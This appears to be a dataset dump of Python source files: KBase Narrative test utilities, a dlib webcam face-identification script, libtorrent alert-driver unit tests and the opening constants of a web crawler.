source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
util.py | """
Test utility functions
"""
import logging
import pickle
import struct
import threading
import time
import unittest
import socketserver
import socket
import os
import json
import configparser
from contextlib import closing
from biokbase.narrative.common import util
from biokbase.workspace.client import Workspace
from biokbase.narrative.common.narrative_ref import NarrativeRef
__author__ = "Dan Gunter <dkgunter@lbl.gov>, Bill Riehl <wjriehl@lbl.gov>"

# Module-level test logger: DEBUG-level to stderr with a timestamped format.
_log = logging.getLogger("kbtest")
_hnd = logging.StreamHandler()
_hnd.setFormatter(
    logging.Formatter("[%(levelname)s] %(asctime)s %(name)s: %(message)s")
)
_log.addHandler(_hnd)
_log.setLevel(logging.DEBUG)

# Workspace service endpoints (production and continuous-integration).
prod_ws = "https://kbase.us/services/ws"
ci_ws = "https://ci.kbase.us/services/ws"
# Template metadata for workspaces created by upload_narrative.
# NOTE(review): callers must copy this dict before mutating it.
ws_metadata = {"is_temporary": False, "narrative_nice_name": None}
# Test configuration file name, resolved relative to the tests directory.
_config_file = "test.cfg"
def test_logger(name):
return logging.getLogger("kbtest." + name)
class ConfigTests(object):
    """
    Helper around the test config file (test.cfg) and test-relative paths.

    Resolves paths relative to <NARRATIVE_DIR>/src/biokbase/narrative/tests
    (or NARRATIVE_DIR itself with from_root=True) and proxies lookups to a
    configparser loaded from test.cfg.
    """

    def __init__(self):
        # NOTE(review): requires the NARRATIVE_DIR environment variable;
        # raises KeyError if it is unset.
        self._path_prefix = os.path.join(
            os.environ["NARRATIVE_DIR"], "src", "biokbase", "narrative", "tests"
        )
        self._path_root = os.path.join(os.environ["NARRATIVE_DIR"])
        config_file_path = self.file_path(_config_file)
        self._config = configparser.ConfigParser()
        self._config.read(config_file_path)

    def get(self, *args, **kwargs):
        """Proxy to configparser.ConfigParser.get (section, option, ...)."""
        return self._config.get(*args, **kwargs)

    def get_path(self, *args, **kwargs):
        """
        Look up a config value and resolve it as a path.

        Extra keyword: from_root (default False) resolves relative to
        NARRATIVE_DIR instead of the tests directory.
        """
        # pop() replaces the original check/read/delete triple
        from_root = kwargs.pop("from_root", False)
        val = self.get(*args, **kwargs)
        return self.file_path(val, from_root)

    def load_json_file(self, filename):
        """
        Read, parse, and return (as a dict) a JSON file.

        The filename parameter is expected to be a path relative to this
        file's expected location in <narrative_root>/src/biokbase/narrative/tests
        """
        json_file_path = self.file_path(filename)
        # json.load reads from the handle directly; the with-block closes it
        # (the original also called f.close() redundantly inside the with).
        with open(json_file_path, "r") as f:
            return json.load(f)

    def file_path(self, filename, from_root=False):
        """
        Return the path to filename, relative to this file's expected location
        <narrative root>/src/biokbase/narrative/tests, or to the narrative
        root when from_root is True.
        """
        if from_root:
            return os.path.join(self._path_root, filename)
        return os.path.join(self._path_prefix, filename)
def fetch_narrative(nar_id, auth_token, url=ci_ws, file_name=None):
    """
    Fetch a Narrative object with the given reference id (of the form ##/##).

    If file_name is given, the JSON string is also written to that file.
    If the narrative is found, its JSON-serialized string is returned.
    If nothing is found, an empty dict is returned (NOTE(review): the mixed
    str/dict return type is preserved for backward compatibility).
    """
    ws_client = Workspace(url=url, token=auth_token)
    nar_data = ws_client.get_objects([{"ref": nar_id}])
    if nar_data:
        nar_json = json.dumps(nar_data[0])
        if file_name is not None:
            # with-block guarantees the handle is closed even if write fails
            # (the original leaked the handle on a write error)
            with open(file_name, "w") as f:
                f.write(nar_json)
        return nar_json
    return {}
def upload_narrative(nar_file, auth_token, user_id, url=ci_ws, set_public=False):
    """
    Upload a Narrative from a downloaded object file.

    This file needs to be in JSON format, and it expects all data and info
    that is usually returned by the Workspace.get_objects method.

    Returns a dict of four elements:
        ws: the id of the workspace that was created
        obj: the id of the narrative object
        refstr: the above two joined together into an object ref string
        ref: a NarrativeRef built from the two ids
    """
    # read the file
    with open(nar_file, "r") as f:
        nar = json.load(f)
    # Copy the module-level metadata template instead of aliasing it --
    # the original wrote through the alias, leaking this narrative's name
    # into every subsequent call's metadata.
    current_nar_metadata = dict(ws_metadata)
    current_nar_metadata["narrative_nice_name"] = nar["data"]["metadata"]["name"]
    ws_client = Workspace(url=url, token=auth_token)
    # create the new workspace for the narrative; the timestamp suffix keeps
    # the workspace name unique per test run
    ws_info = ws_client.create_workspace(
        {
            "workspace": "{}:{}".format(user_id, str(time.time()).replace(".", "")),
            "meta": current_nar_metadata,
            "globalread": "r" if set_public else "n",
        }
    )
    ws_id = ws_info[0]
    # setup and save the narrative object
    # (a dead bare expression `nar["info"][10]` was removed here)
    ws_save_obj = {
        "type": "KBaseNarrative.Narrative",
        "data": nar["data"],
        "name": nar["info"][1],
        "meta": nar["info"][10],
        "provenance": [
            {
                "script": "upload_narrative_test.py",
                "description": "Temporary Narrative uploaded for automated testing",
            }
        ],
    }
    obj_info = ws_client.save_objects({"id": ws_id, "objects": [ws_save_obj]})
    # tweak the workspace's metadata to properly present its narrative
    ws_client.alter_workspace_metadata(
        {"wsi": {"id": ws_id}, "new": {"narrative": obj_info[0][0]}}
    )
    return {
        "ws": ws_info[0],
        "obj": obj_info[0][0],
        "refstr": "{}/{}".format(ws_info[0], obj_info[0][0]),
        "ref": NarrativeRef({"wsid": ws_info[0], "objid": obj_info[0][0]}),
    }
def delete_narrative(ws_id, auth_token, url=ci_ws):
    """
    Delete the workspace with the given id.

    Throws a ServerError if the user given by auth_token isn't allowed
    to do so.
    """
    ws_client = Workspace(url=url, token=auth_token)
    ws_client.delete_workspace({"id": ws_id})
def read_token_file(path):
    """
    Read a token file and return the token, or None if path is not a file.

    A token file is just expected to have a single line in it - the token
    itself.
    """
    # guard clause instead of if/else nesting
    if not os.path.isfile(path):
        return None
    # with-block closes the handle; the original also called f.close()
    # redundantly inside the with
    with open(path, "r") as f:
        return f.read().strip()
def read_json_file(path):
    """
    Generically read in any JSON file and return it as a dict.

    Especially intended for reading a Narrative file.
    """
    # json.load parses straight from the handle; with closes it (the
    # original also called f.close() redundantly inside the with)
    with open(path, "r") as f:
        return json.load(f)
class MyTestCase(unittest.TestCase):
    """Unit tests for biokbase.narrative.common.util helpers."""

    def test_kvparse(self):
        # each case: (raw input, expected remaining text, expected parsed kvps)
        for raw, text, kvp in (
            ("foo", "foo", {}),
            ("name=val", "", {"name": "val"}),
            ("a name=val boy", "a boy", {"name": "val"}),
        ):
            rkvp = {}
            rtext = util.parse_kvp(raw, rkvp)
            self.assertEqual(
                text,
                rtext,
                "Text '{}' does not match "
                "result '{}' "
                "from input '{}'".format(text, rtext, raw),
            )
            # Compare the parsed key/value dict. The original accidentally
            # re-compared text/rtext here, so kvp was never checked.
            self.assertEqual(
                kvp,
                rkvp,
                "Dict '{}' does not match "
                "result '{}' "
                "from input '{}'".format(kvp, rkvp, raw),
            )
class SocketServerBuf(socketserver.TCPServer):
    """A TCPServer that accumulates handler output in a string buffer."""

    allow_reuse_address = True

    def __init__(self, addr, handler):
        super().__init__(addr, handler)
        # accumulated text appended by request handlers
        self.buf = ""

    def get_data(self):
        """Get current buffer and clear it."""
        data = self.buf
        self.buf = ""
        return data

    def server_close(self):
        """Close the listening socket."""
        self.socket.close()
def recvall(socket, n, timeout=0):
    """
    Receive exactly n bytes from a socket, polling until they all arrive.

    :param socket: connected socket to read from (parameter shadows the
        stdlib `socket` module name at file scope; the module is unused here)
    :param n: total number of bytes to read
    :param timeout: seconds to wait before giving up; 0 means wait forever
    :raises RuntimeError: if timeout > 0 and the bytes did not arrive in time
    :return: the accumulated bytes
    """
    # buf = accumulated bytes, m = bytes received so far, t = start time
    buf, m, t = b"", 0, time.time()
    while m < n:
        if timeout > 0 and (time.time() - t > timeout):
            raise RuntimeError("Timeout")
        b = socket.recv(n - m)
        if b:
            buf += b
            m += len(b)
            # print("@@ recv {}".format(len(b)))
        else:
            # NOTE(review): recv() returning b"" means the peer closed the
            # connection; with timeout=0 this loop then sleeps forever --
            # confirm callers always pass a timeout when disconnects are
            # possible.
            time.sleep(0.1)
            # print("@@ recv 0/{}".format(n - m))
    return buf
class LogProxyMessageBufferer(socketserver.BaseRequestHandler):
    """
    Handler that unpickles length-prefixed logging records from the socket
    and appends each record's 'msg' field to the owning server's buffer.
    """

    def handle(self):
        self.request.settimeout(1)
        while True:
            try:
                # 4-byte big-endian length prefix precedes each pickled record
                hdr = self.request.recv(4)
            except Exception:
                # timeout or socket error ends the handler
                return
            if not hdr:
                # peer closed the connection
                return
            size = struct.unpack(">L", hdr)[0]
            # print("@@ body {}".format(size))
            # sanity cap: frames of 64 KiB or more are silently skipped
            if size < 65536:
                chunk = recvall(self.request, size, timeout=1)
                # SECURITY NOTE(review): pickle.loads on bytes read from a
                # socket executes arbitrary code if the peer is untrusted --
                # acceptable only because this is a test-local server.
                record = pickle.loads(chunk)
                # print("@@ message <{}>".format(record['msg']))
                self.server.buf += record["msg"]
class NarrativeMessageBufferer(socketserver.StreamRequestHandler):
    """Handler that appends one newline-terminated line to the server buffer."""

    def handle(self):
        # self.rfile is a file-like object created by the handler;
        # we can now use e.g. readline() instead of raw recv() calls
        self.data = self.rfile.readline().strip()
        # print("{} wrote:".format(self.client_address[0]))
        # print(self.data)
        # rfile yields bytes; decode before appending to the str buffer
        self.server.buf += self.data.decode("utf-8")
def start_tcp_server(host, port, poll_interval, bufferer=LogProxyMessageBufferer):
    """
    Start a SocketServerBuf serving on host:port in a daemon thread.

    Returns the (server, thread) pair so the caller can stop both later
    with stop_tcp_server.
    """
    _log.info("Starting server on {}:{}".format(host, port))
    server = SocketServerBuf((host, port), bufferer)
    # daemon thread dies with the interpreter if the test forgets to stop it
    thr = threading.Thread(
        target=server.serve_forever, args=[poll_interval], daemon=True
    )
    thr.start()
    return server, thr
def stop_tcp_server(server, thr):
    """
    Shut down a server started by start_tcp_server and join its thread.

    shutdown() stops serve_forever(); only after the serving thread has
    exited is the listening socket closed via server_close().
    """
    _log.info("Stopping server")
    server.shutdown()
    thr.join()
    _log.info("Stopped server")
    server.server_close()
    _log.info("Closed server")
def find_free_port() -> int:
    """Bind an ephemeral port, release it, and return its number."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    with closing(sock) as bound:
        # port 0 asks the OS for any free ephemeral port
        bound.bind(("", 0))
        return bound.getsockname()[1]
def validate_job_state(state: dict) -> None:
    """
    Validate the structure and entries in a job state as returned by the
    JobManager.

    If any required keys are missing, have the wrong type, or an optional
    key is present with the wrong type, this raises an AssertionError.
    """
    # list of tuples - first = key name, second = value type
    # details for other cases comes later. This is just the expected basic set of
    # keys for EVERY job, once it's been created in EE2.
    expected_state_keys = [
        ("job_id", str),
        ("status", str),
        ("created", int),
        ("updated", int),
        ("run_id", str),
        ("cell_id", str),
    ]
    optional_state_keys = [
        ("queued", int),
        ("finished", int),
        ("terminated_code", int),
        ("parent_job_id", str),
        ("errormsg", str),
        ("error", dict),
        ("error_code", int),
    ]
    assert "state" in state, "state key missing"
    assert isinstance(state["state"], dict), "state is not a dict"
    assert "owner" in state, "owner key missing"
    assert isinstance(state["owner"], str), "owner is not a string"
    for key, val_type in expected_state_keys:
        assert key in state["state"], f"{key} key is missing from state"
        assert isinstance(
            state["state"][key], val_type
        ), f"{key} is not a {val_type}"
    for key, val_type in optional_state_keys:
        # Two fixes: the original tested `k in state["state"]` with k being
        # the whole (name, type) tuple, so optional keys were never actually
        # validated; and isinstance(x, (T, None)) raises TypeError -- the
        # None-allowed form is type(None).
        if key in state["state"]:
            assert isinstance(
                state["state"][key], (val_type, type(None))
            ), f"Optional key {key} is present and not {val_type} or None"
# Allow running this module's tests directly: python util.py
if __name__ == "__main__":
    unittest.main()
|
Original.py | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 24 04:19:09 2018
@author: Mikko Pohja
"""
import os
import sys
import cv2
import dlib
import numpy as np
import time
import threading
import glob
from skimage import io
# Load dlib models at import time (fails fast if ./models is missing).
face_recognition = dlib.face_recognition_model_v1('./models/dlib_face_recognition_resnet_model_v1.dat')
face_detector = dlib.get_frontal_face_detector()
shape_predictor = dlib.shape_predictor('./models/shape_predictor_68_face_landmarks.dat')
# name -> face descriptor vector for every enrolled person
enrolled_faces = {}
# Semaphore for identifying thread: True while a frame is being processed,
# so the webcam loop dispatches at most one handler at a time
identifying = False
def face_to_vector(image, face):
    """Compute the face descriptor for `face` as a float numpy array."""
    descriptor = face_recognition.compute_face_descriptor(image, face)
    return np.array(descriptor).astype(float)
def faces_from_image(image):
    """
    Detect faces in `image` and return their landmark shapes, largest first.

    Returns a list of shape_predictor results sorted by bounding-box area,
    descending.
    """
    UPSAMPLING_FACTOR = 0  # 0 = detect at native resolution (fastest)
    faces = [
        (face.height() * face.width(), shape_predictor(image, face))
        for face in face_detector(image, UPSAMPLING_FACTOR)
    ]
    # Sort on the area only: the original sorted the (area, shape) tuples
    # directly, which falls through to comparing the dlib shape objects when
    # two faces have equal area and raises TypeError.
    faces.sort(key=lambda pair: pair[0], reverse=True)
    return [shape for _, shape in faces]
def image_from_file(path):
    """Load the image file at `path` as an array."""
    image = io.imread(path)
    return image
def identify(image):
    """
    Identify the largest face in `image` against the enrolled faces.

    Returns (identifier, distance) for the closest enrolled face.
    Raises ValueError if no face is detected or nobody is enrolled (the
    original crashed inside dlib/numpy in those cases).
    """
    # Get all faces (largest first)
    faces = faces_from_image(image)
    if not faces:
        raise ValueError("no face detected in image")
    if not enrolled_faces:
        raise ValueError("no faces enrolled")
    # Pick largest face
    face = faces[0]
    # Calculate face descriptor
    descriptor = face_recognition.compute_face_descriptor(image, face)
    face_vector = np.array(descriptor).astype(float)
    # Snapshot identifiers and vectors from the same dict without mutating it
    # in between: dicts preserve insertion order (Python 3.7+), so the two
    # list() calls line up index-for-index.
    enroll_identifiers = np.array(list(enrolled_faces.keys()))
    enroll_matrix = np.array(list(enrolled_faces.values()))
    # Calculate differences between the face and all enrolled faces
    differences = np.subtract(np.array(enroll_matrix), face_vector)
    distances = np.linalg.norm(differences, axis=1)
    # and pick the closest one
    closest_index = np.argmin(distances)
    return enroll_identifiers[closest_index], distances[closest_index]
def handle_frame(origFrame, cb):
    """
    Identify the face in one webcam frame and report the result through `cb`.

    cb is called as cb(identifier, distance, duration) where identifier is an
    enrolled name, '-' for an unknown face, or None on error. Always clears
    the `identifying` flag so the webcam loop can dispatch the next frame.
    """
    global identifying
    # Start the clock before any work: the original assigned `start` inside
    # the try after cv2.resize, so a resize failure raised NameError in the
    # except handler instead of reporting through cb.
    start = time.time()
    try:
        # half resolution is enough for recognition and much faster
        frame = cv2.resize(origFrame, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_CUBIC)
        identifier, distance = identify(frame)
        if (distance < 0.6):
            cb(identifier, distance, time.time() - start)
        else:
            # distance over the match threshold: report an unknown person
            cb('-', distance, time.time() - start)
        sys.stdout.flush()
    except Exception:
        # best-effort: report failure (e.g. no face found) rather than crash
        # the handler thread (removed the dead `exc = e` binding)
        cb(None, 0, time.time() - start)
        # print(e)
    identifying = False
def webcam(cb):
    """
    Capture frames from the default webcam and identify faces.

    Grabs frames continuously, but only dispatches one to a background
    handle_frame thread when no identification is already in flight (the
    `identifying` flag acts as a one-slot semaphore). `cb` receives each
    identification result.
    """
    global identifying
    video_capture = cv2.VideoCapture(0)
    while True:
        # grab() advances the stream cheaply; retrieve() decodes only when
        # we are actually going to process the frame
        video_capture.grab()
        if (not identifying):
            ret, frame = video_capture.retrieve()
            if (ret == False):
                print('No frame')
                break
            identifying = True
            thread = threading.Thread(target=handle_frame, args=(frame, cb))
            thread.daemon=True
            thread.start()
    # When everything is done, release the capture
    video_capture.release()
def load_enrolled_faces():
    """
    Load the enrolled-faces dict (name -> descriptor vector) from faces.npy.

    np.save stores a dict as a 0-d object array; allow_pickle=True is
    required to load it back on NumPy >= 1.16.3 (where it defaults to False
    and the original call raised), and .item() unwraps the dict.
    """
    global enrolled_faces
    enrolled_faces = np.load('faces.npy', allow_pickle=True).item()
def enroll_face(image, name):
    """
    Compute the descriptor of the largest face in `image` and register it
    under `name` in the in-memory enrolled_faces dict.

    Best-effort: any failure (e.g. no face found) is printed and swallowed
    so one bad image does not abort a batch enrollment. Does not persist
    to disk; the caller saves faces.npy.
    """
    try:
        # find face
        faces = faces_from_image(image)
        # Pick largest face
        face = faces[0] if faces else None
        # face to vector
        # NOTE(review): face may be None here; face_to_vector then raises and
        # is reported below -- confirm this is the intended "no face" path.
        face_vector = face_to_vector(image, face)
        # save to enrolled faces list
        enrolled_faces[name] = face_vector
        # save npy file
    except Exception as e:
        print('Unable to enroll', name)
        print(e)
def logger(identifier, distance, duration):
    """
    Print one identification result.

    identifier is an enrolled name, '-' for an unknown person, or None when
    no face was found; distance is the descriptor distance; duration the
    processing time in seconds.
    """
    if (identifier == '-'):
        print('Unknown person', duration)
    elif (identifier is None):
        # `is None` identity check instead of `== None` (PEP 8)
        print('No face', duration)
    else:
        print(identifier, distance, duration)
def enrollImages():
    """
    Enroll every faces/*.jpg image and persist the result to faces.npy.

    The enrolled name is the image's base filename without its extension.
    """
    print('Enrolling all images')
    for filename in glob.glob('faces/*.jpg'):
        print(filename)
        # os.path handles both / and \ separators; the original
        # filename.split('/')[1] broke on Windows paths (glob returns
        # backslash-separated paths there).
        name = os.path.splitext(os.path.basename(filename))[0]
        image = image_from_file(filename)
        enroll_face(image, name)
        print('Enrolled', name)
    np.save('faces.npy', enrolled_faces)
    print('Saved faces.npy')
# Script entry: build the enrollment database on first run, otherwise load
# the saved one, then start the webcam identification loop (runs until the
# camera stops delivering frames).
if (not os.path.isfile('faces.npy')):
    enrollImages()
else:
    print('Loading enrolled faces from faces.npy')
    load_enrolled_faces()
webcam(logger)
|
alertdriver_test.py | # Copyright (c) 2020 AllSeeingEyeTolledEweSew
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
import concurrent.futures
import contextlib
import gc
import tempfile
import threading
from typing import Iterator
from typing import List
from typing import Optional
from typing import Type
import unittest
import libtorrent as lt
from tvaf import driver as driver_lib
from tvaf import session as session_lib
from tvaf import util
from . import lib
from . import tdummy
@contextlib.contextmanager
def make_some_alerts() -> Iterator[List[lt.alert]]:
    """
    Yield a list of real libtorrent alerts from a throwaway session.

    The session_log alert category guarantees at least one alert arrives
    within the 10s wait.
    """
    session = lib.create_isolated_session_service(
        alert_mask=lt.alert_category.session_log
    ).session
    alert = session.wait_for_alert(10000)
    assert alert is not None
    alerts = session.pop_alerts()
    yield alerts
    # NB: session stays alive until the context exits, because this stack frame
    # references it
def executor() -> concurrent.futures.ThreadPoolExecutor:
    """Return a fresh thread-pool executor for running test tasks."""
    pool = concurrent.futures.ThreadPoolExecutor()
    return pool
# NB: We'd like to test that iterators don't hold any unintended references to
# alerts, but this is hard to test because exceptions refer to stack frames
# which refer to alerts in many cases, including StopIteration.
class IteratorTest(unittest.TestCase):
    """
    Unit tests for driver_lib.Iterator: close/safety semantics, alert
    delivery order, and safe-notification through a selectable pipe.
    """

    def test_close_inline_is_safe(self) -> None:
        iterator = driver_lib.Iterator()

        # consumer closes the iterator from inside its own for-loop
        def iterate_and_close() -> None:
            for _ in iterator:
                iterator.close()

        future = executor().submit(iterate_and_close)
        with make_some_alerts() as alerts:
            iterator.feed(*alerts)
            future.result()
        self.assertTrue(iterator.is_closed())
        # We exited naturally, so we should be marked safe
        self.assertTrue(iterator.is_safe())

    def test_break_context_manager_is_safe(self) -> None:
        iterator = driver_lib.Iterator()

        # consumer breaks out while inside the iterator's context manager
        def iterate_and_close() -> None:
            with iterator:
                for _ in iterator:
                    break

        future = executor().submit(iterate_and_close)
        with make_some_alerts() as alerts:
            iterator.feed(*alerts)
            future.result()
        self.assertTrue(iterator.is_closed())
        # We exited from a context manager, so we should be marked safe
        self.assertTrue(iterator.is_safe())

    def test_visit_order(self) -> None:
        iterator = driver_lib.Iterator()

        # returns the message of the first alert delivered
        def iterate_and_close() -> str:
            for alert in iterator:
                message = alert.message()
                iterator.close()
                return message
            raise AssertionError("unreachable")

        future = executor().submit(iterate_and_close)
        with make_some_alerts() as alerts:
            iterator.feed(*alerts)
            # the first fed alert must be the first one delivered
            expected_message = alerts[0].message()
            self.assertEqual(future.result(), expected_message)

    def test_feed_marks_unsafe(self) -> None:
        iterator = driver_lib.Iterator()
        with make_some_alerts() as alerts:
            result = iterator.feed(*alerts)
            self.assertTrue(result)
            self.assertFalse(iterator.is_safe())

    def test_feed_empty_not_unsafe(self) -> None:
        # feeding zero alerts should not mark the iterator unsafe
        iterator = driver_lib.Iterator()
        result = iterator.feed()
        self.assertFalse(result)
        self.assertTrue(iterator.is_safe())

    def test_feed_after_close(self) -> None:
        # alerts fed after close are rejected and do not affect safety
        iterator = driver_lib.Iterator()
        iterator.close()
        with make_some_alerts() as alerts:
            result = iterator.feed(*alerts)
            self.assertFalse(result)
            self.assertTrue(iterator.is_safe())

    def test_close(self) -> None:
        iterator = driver_lib.Iterator()
        iterator.close()
        self.assertTrue(iterator.is_closed())
        with self.assertRaises(StopIteration):
            next(iterator)

    def test_close_twice(self) -> None:
        # a second close (even with an exception argument) stays closed
        iterator = driver_lib.Iterator()
        iterator.close()
        iterator.close(Exception())
        self.assertTrue(iterator.is_closed())
        with self.assertRaises(StopIteration):
            next(iterator)

    def test_safe(self) -> None:
        iterator = driver_lib.Iterator()
        with make_some_alerts() as alerts:
            iterator.feed(*alerts)
            iterator.close()
            # fed-but-unconsumed alerts keep the iterator unsafe until
            # set_safe() is called explicitly
            self.assertFalse(iterator.is_safe())
            iterator.set_safe()
            self.assertTrue(iterator.is_safe())

    def test_safe_without_close(self) -> None:
        # set_safe() before close() is an error
        iterator = driver_lib.Iterator()
        with make_some_alerts() as alerts:
            iterator.feed(*alerts)
            with self.assertRaises(ValueError):
                iterator.set_safe()

    def test_safe_notify(self) -> None:
        iterator = driver_lib.Iterator()
        rfile, wfile = util.selectable_pipe()
        iterator.set_notify_safe_file(wfile)
        with make_some_alerts() as alerts:
            iterator.feed(*alerts)
            iterator.close()
            # Not safe, not notified
            self.assertFalse(iterator.is_safe())
            self.assertEqual(rfile.read(), None)
            iterator.set_safe()
            # We become safe, and should be notified
            self.assertTrue(iterator.is_safe())
            self.assertNotEqual(rfile.read(), None)
            # Second call to set_safe shouldn't notify again
            iterator.set_safe()
            self.assertEqual(rfile.read(), None)

    def test_safe_notify_return(self) -> None:
        # set_notify_safe_file returns the previously registered file
        iterator = driver_lib.Iterator()
        _, wfile = util.selectable_pipe()
        initial = iterator.set_notify_safe_file(wfile)
        self.assertEqual(initial, None)
        previous = iterator.set_notify_safe_file(None)
        self.assertEqual(previous, wfile)
class Pumper(threading.Thread):
    """Background thread that pumps driver alerts until shutdown() is called."""

    def __init__(self, driver: driver_lib.AlertDriver):
        super().__init__()
        self.driver = driver
        # checked once per loop iteration; set() requests exit
        self.stopped = threading.Event()

    def run(self) -> None:
        while not self.stopped.is_set():
            self.driver.pump_alerts()

    def shutdown(self) -> None:
        """Request the pump loop to stop and wait for the thread to exit."""
        self.stopped.set()
        self.join()
class PumpAlertsConcurrencyTest(unittest.TestCase):
    """
    Exercise pump_alerts() interleaved with iterator creation and a
    background Pumper, across all interleavings selected by `flags`.
    """

    def setUp(self) -> None:
        self.tempdir = tempfile.TemporaryDirectory()

    def tearDown(self) -> None:
        self.tempdir.cleanup()

    def do_concurrency_test(self, flags) -> None:
        session_service = lib.create_isolated_session_service()
        session = session_service.session
        driver = driver_lib.AlertDriver(session_service=session_service)
        pumper = Pumper(driver)
        # Do some combination of possible concurrent things
        # (bit 0: pump before creating the iterator)
        if flags & 1:
            driver.pump_alerts()
        iterator = driver.iter_alerts(
            lt.alert_category.status, lt.add_torrent_alert
        )
        # (bit 1: pump after creating the iterator)
        if flags & 2:
            driver.pump_alerts()
        atp = tdummy.DEFAULT.atp()
        atp.save_path = self.tempdir.name
        session.async_add_torrent(atp)
        pumper.start()
        saw_add_alert = False
        with iterator:
            for alert in iterator:
                if isinstance(alert, lt.add_torrent_alert):
                    saw_add_alert = True
                    break
                # any other alert type means the filter failed
                raise AssertionError(f"saw unexpected {alert}")
        self.assertTrue(saw_add_alert)
        pumper.shutdown()

    def test_concurrency(self) -> None:
        # run every combination of the two pump-timing bits
        for flags in range(4):
            self.do_concurrency_test(flags)
class IterAlertsTest(unittest.TestCase):
    """
    Integration tests for AlertDriver.iter_alerts: filtering, forking a
    per-handle iterator, dead-iterator detection and checkpoint timeouts.
    """

    def setUp(self) -> None:
        self.config = lib.create_isolated_config()
        # Always enable session log, for iterator tests requiring alerts
        self.session_service = session_lib.SessionService(
            config=self.config, alert_mask=lt.alert_category.session_log
        )
        self.session = self.session_service.session
        self.driver = driver_lib.AlertDriver(
            session_service=self.session_service
        )
        self.pumper = Pumper(self.driver)
        self.tempdir = tempfile.TemporaryDirectory()

    def tearDown(self) -> None:
        self.tempdir.cleanup()

    def test_iter_alerts(self) -> None:
        iterator = self.driver.iter_alerts(
            lt.alert_category.status, lt.add_torrent_alert
        )
        atp = tdummy.DEFAULT.atp()
        atp.save_path = self.tempdir.name
        self.session.async_add_torrent(atp)
        self.pumper.start()
        saw_add_alert = False
        with iterator:
            for alert in iterator:
                if isinstance(alert, lt.add_torrent_alert):
                    saw_add_alert = True
                    break
                # any other alert type means the filter failed
                raise AssertionError(f"saw unexpected {alert}")
        self.assertTrue(saw_add_alert)
        self.pumper.shutdown()

    def test_fork_with_handle(self) -> None:
        self.pumper.start()
        iterator = self.driver.iter_alerts(
            lt.alert_category.status, lt.add_torrent_alert
        )
        # Trigger add and remove
        atp = tdummy.DEFAULT.atp()
        atp.save_path = self.tempdir.name
        handle = self.session.add_torrent(atp)
        self.session.remove_torrent(handle)
        forkee_saw_types: List[Type[lt.alert]] = []
        forkee: Optional[threading.Thread] = None

        def watch_handle(handle_iterator: driver_lib.Iterator) -> None:
            # record every alert type until the torrent is removed
            with handle_iterator:
                for alert in handle_iterator:
                    forkee_saw_types.append(alert.__class__)
                    if isinstance(alert, lt.torrent_removed_alert):
                        break

        with iterator:
            for alert in iterator:
                if isinstance(alert, lt.add_torrent_alert):
                    # Fork a task to watch add and remove alerts on this handle
                    handle_iterator = self.driver.iter_alerts(
                        lt.alert_category.status,
                        lt.add_torrent_alert,
                        lt.torrent_removed_alert,
                        handle=alert.handle,
                        start=alert,
                    )
                    forkee = threading.Thread(
                        target=watch_handle, args=(handle_iterator,)
                    )
                    forkee.start()
                    break
                raise AssertionError(f"saw unexpected {alert}")
        assert forkee is not None
        forkee.join()
        # Fixed: the original called assertTrue(forkee_saw_types, [...]),
        # which treats the expected list as a mere failure message and passes
        # for ANY non-empty list; assertEqual actually compares the observed
        # alert-type sequence against the expectation.
        self.assertEqual(
            forkee_saw_types, [lt.add_torrent_alert, lt.torrent_removed_alert]
        )
        self.pumper.shutdown()

    def test_dead_iterator_detection(self) -> None:
        iterator = self.driver.iter_alerts(lt.alert_category.session_log)
        # Feed iterator some alerts
        self.driver.pump_alerts()
        self.assertFalse(iterator.is_safe())
        # Let iterator die without closing
        del iterator
        # Not necessary as of writing, but good defense
        gc.collect()
        # Should detect the dead iterator, and eventually proceed
        self.driver.pump_alerts()
        # NB: This test may fail for reasons that are meaningless in production
        # (I saw pytest's logger hold a reference due to log("%s", iterator)),
        # but I still think this test is useful as I want to catch *any*
        # unexpected references, so dead iterator protection works as well as
        # it can

    def test_checkpoint_timeout(self) -> None:
        iterator = self.driver.iter_alerts(lt.alert_category.session_log)
        # Feed iterator some alerts
        self.driver.pump_alerts()
        self.assertFalse(iterator.is_safe())
        # Second pump should wait for a checkpoint after the first pump, which
        # never comes
        with self.assertRaises(driver_lib.CheckpointTimeout):
            self.driver.pump_alerts(timeout=0.1)
class DriverTest(unittest.TestCase):
    """
    Tests for AlertDriver lifecycle: terminate() unblocks consumers with
    DriverShutdown and rejects new iterators afterwards.
    """

    def setUp(self) -> None:
        self.session_service = lib.create_isolated_session_service()
        self.driver = driver_lib.AlertDriver(
            session_service=self.session_service
        )

    def test_start_and_close(self) -> None:
        self.driver.start()
        iterator = self.driver.iter_alerts(lt.alert_category.session_log)
        # Consume iterator (list() blocks until the iterator ends)
        future = executor().submit(list, iterator)
        self.driver.terminate()
        # termination propagates DriverShutdown into the blocked consumer
        with self.assertRaises(driver_lib.DriverShutdown):
            future.result()
        self.driver.join()
        # Further iter_alerts should fail
        with self.assertRaises(driver_lib.DriverShutdown):
            self.driver.iter_alerts(lt.alert_category.session_log)
|
main.py | import threading
from queue import Queue
from spider import Spider
from domain import *
from general import *
# Crawl target and per-project bookkeeping files.
PROJECT_NAME = 'calstatela'
HOMEPAGE = 'http://calstatela.edu/'
DOMAIN_NAME = get_domain_name(HOMEPAGE)
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
# NOTE(review): missing '/' separator -- this resolves to
# 'calstatelacrawledDict.txt' in the cwd, unlike the two paths above;
# confirm whether 'calstatela/crawledDict.txt' was intended.
CRAWLED_DICT_FILE = PROJECT_NAME + 'crawledDict.txt'
NUMBER_OF_THREADS = 8
